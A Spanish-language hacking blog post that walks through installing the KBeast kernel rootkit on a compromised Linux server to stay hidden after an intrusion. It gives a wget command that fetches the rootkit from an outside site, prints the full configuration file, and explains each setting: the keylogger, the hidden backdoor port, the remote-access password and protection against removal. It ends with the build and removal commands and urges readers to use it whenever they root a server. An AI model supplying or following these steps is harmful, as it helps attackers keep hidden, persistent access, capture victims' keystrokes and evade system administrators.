q3rv0

Follow the white rabbit….

[KBEAST] Plantando Un Rootkit

Siempre es conveniente asegurarse el silencio luego de una intrusion, y con que me refiero al silencio? Ademas de entrar en el tema de borrado de huellas, me refiero a la accion de dejar un secuas en el servidor que se encargue de ocultar ciertos procesos, archivos, etc que dejemos en el target para esto voy a utilizar a KBeast que es un rootkit 2011, ademas de uno de mis preferidos, tiene soporte para los kernel 2.6.18 y 2.6.32,y presenta varias funcionalidades interesantes como:

-Ocultar archivos y directorios

-Ocultar procesos de (ps, pstree, top, lsof)

– Ocultar puertos locales abiertos (backdoors)

-Viene con un modulo keylogger incorporado para capturar las pulsaciones.

-Anti-kill para procesos

-Anti-remove para archivos

-Trae un backdoor bind incorporado

– Tambien se encarga de esconder ciertos modulos cargando en el kernel ademas de un anti-remove para estos.

Bastante completita la basura!, demas esta decir que requerimos de privilegios de usuario root, en este caso lo voy a realizar en un debian con un kernel 2.6.32 (entorno controlado)

Descargamos el rootkit.

1
wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz

Una vez extraido nos encontramos con varios files, tendremos que editar a nuestro antojo el archivo de configuracion config.h

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
/*
Kernel Beast Ver #1.0 - Configuration File
Copyright Ph03n1X of IPSECS (c) 2011
Get more research of ours http://ipsecs.com
*/
 
/*Don't change this line*/
#define TRUE 1
#define FALSE 0
 
/*
Enable keylog probably makes the system unstable
But worth to be tried
*/
#define _KEYLOG_ TRUE
 
/*Define your module & network daemon name*/
#define KBEAST "kbeast"
 
/*
All files, dirs, process will be hidden
Protected from deletion & being killed
*/
#define _H4X0R_ "_h4x_"
 
/*
Directory where your rootkit will be saved
You have to use _H4X0R_ in your directory name
No slash (/) at the end
*/
#define _H4X_PATH_ "/usr/_h4x_"
 
/*
File to save key logged data
*/
#define _LOGFILE_ "acctlog"
 
/*
This port will be hidded from netstat
*/
#define _HIDE_PORT_ 13377
 
/*
Password for remote access
*/
#define _RPASSWORD_ "h4x3d"
#define _MAGIC_NAME_ "bin"
/*
Magic signal & pid for local escalation
*/
#define _MAGIC_SIG_ 37 //kill signal
#define _MAGIC_PID_ 31337 //kill this pid

prosigo a explicar la funcion de cada linea en el fichero de configuracion.

1- La primera linea la dejamos tal cual esta

2- la segunda se encarga de activar el modulo keylogger del rootkit en caso contrario escribimos

1
#define _KEYLOG_ FALSE

3- se encarga de darle el nombre al daemon rootkit

1
#define KBEAST "q3rv0"

4 – En esta linea vamos a incluir los ficheros y directorios que queremos que sean protegidos por el anti-remove.

1
#define _H4X0R_ "/home/q3rv0/protect/q3rv0.txt"

5- Define el directorio donde se guardara KBeast

1
#define _H4X_PATH_ "/usr/share/kbeast"

6 – Aca especificamos el nombre del fichero de log donde van a ir a parar las pulsasiones capturadas por el keylogger

1
#define _LOGFILE_ "acctlog"

7- El puerto que estara hide a la vista de los comandos anteriormente mencionados.

1
#define _HIDE_PORT_ 6666

8- Incluimos el password para el acceso con el backdoor.

1
2
#define _RPASSWORD_ "q3rv0"
#define _MAGIC_NAME_ "bin"

Habiendo terminado de configurar el ficherito, que bastante intuitivo es, si me saltee la 9, pero esa la dejo tal cual esta.

Procedemos a lanzar el rootkit de la siguiente manera.

En los kernel 2.6.18

1
./setup buil 0

En los 2.6.32 como es mi caso

1
./setup build

Vemos que se compilo exitosamente en el nucleo sin ningun error, ahora vamos a comprobar si cumple con nuestras espectativas.

-Verificando la proteccion anti-remove de ficheros

– Directorio donde se guarda el rootkit en el systema

– Pulsaciones capturadas por el modulo keylogger… El fichero de log se guarda en el directorio donde le indicamos que se guarde el rootkit.

– Port 6666 Hide

– Accediendo al sistema a travez del backdoor en el puerto 6666

– oka, para remover el rootkit del kernel solo basta realizar un:

1
./setup clean

Espero que lo hayan disfrutado y cada vez que rooteen un server acuerdense de kbeast :)

Saludos!